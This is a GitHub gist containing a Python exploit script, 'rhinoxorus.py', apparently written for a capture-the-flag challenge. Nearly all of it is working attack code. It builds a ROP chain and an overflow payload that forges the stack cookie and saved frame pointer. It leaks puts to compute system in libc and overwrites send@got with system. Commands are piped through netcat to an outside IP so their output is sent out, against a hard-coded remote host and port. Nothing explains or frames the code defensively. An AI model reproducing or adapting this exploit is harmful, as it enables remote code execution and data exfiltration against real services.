Skip to content

Instantly share code, notes, and snippets.

@peternguyen93

peternguyen93/rhinoxorus.py

Created September 21, 2015 02:39
Show Gist options
  • Save peternguyen93/a5d79671bbc99ef75cb0 to your computer and use it in GitHub Desktop.
Save peternguyen93/a5d79671bbc99ef75cb0 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
rhinoxorus.py
#!/usr/bin/python
from Pwn import *
p = Pwn(host='54.152.37.20',port=24242)
# p = Pwn(port=24242)
def exploit():
shell = raw_input('> ')
back_connect = shell + ' | nc 128.199.171.28 8001'
rop = [
0x8048740, # send
0x080578f8, # pop 4 ; ret
0x4, # fd
0x0805f02c, # puts
8, # size
0x0, # flag
0x8048720, # recv
0x080578f8, # pop 4 ; ret
0x4, # fd
0x0805f068, # overwrite send@got with system
4 + len(back_connect) + 1, # size
0x6, # flag
0x08048878, # system
0x0805f068 + 4
]
payload = 'AAAAAAA' + p.pA(rop)
payload+= 'A'*(127 - len(payload))
payload+= '\x00'*4 # cookie ^ zero = cookie
payload+= '\x00'*4
payload+= '\x00'*4 # use the same ebp
payload+= p.pack(0x8e0 ^ 0x9e8) # point save ebp to own buffer :D
payload+= p.pack(0x08056b39 ^ 0x08056AFA) # own ret address : nop; leave ; ret
payload+= '\x00'*4 # use same args
payload+= p.pack(0x9e) # break the loop
payload+= 'A'*4
p.connect()
p.send('\xff' + payload)
leak = p.recv(8)
puts_addr = p.unpack(leak[:4])
system_addr = puts_addr - p.get_libc_offset(puts_addr,'puts')
print '[+] puts():',hex(puts_addr)
print '[+] system():',hex(system_addr)
p.send(p.pack(system_addr) + back_connect)
# p.io()
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment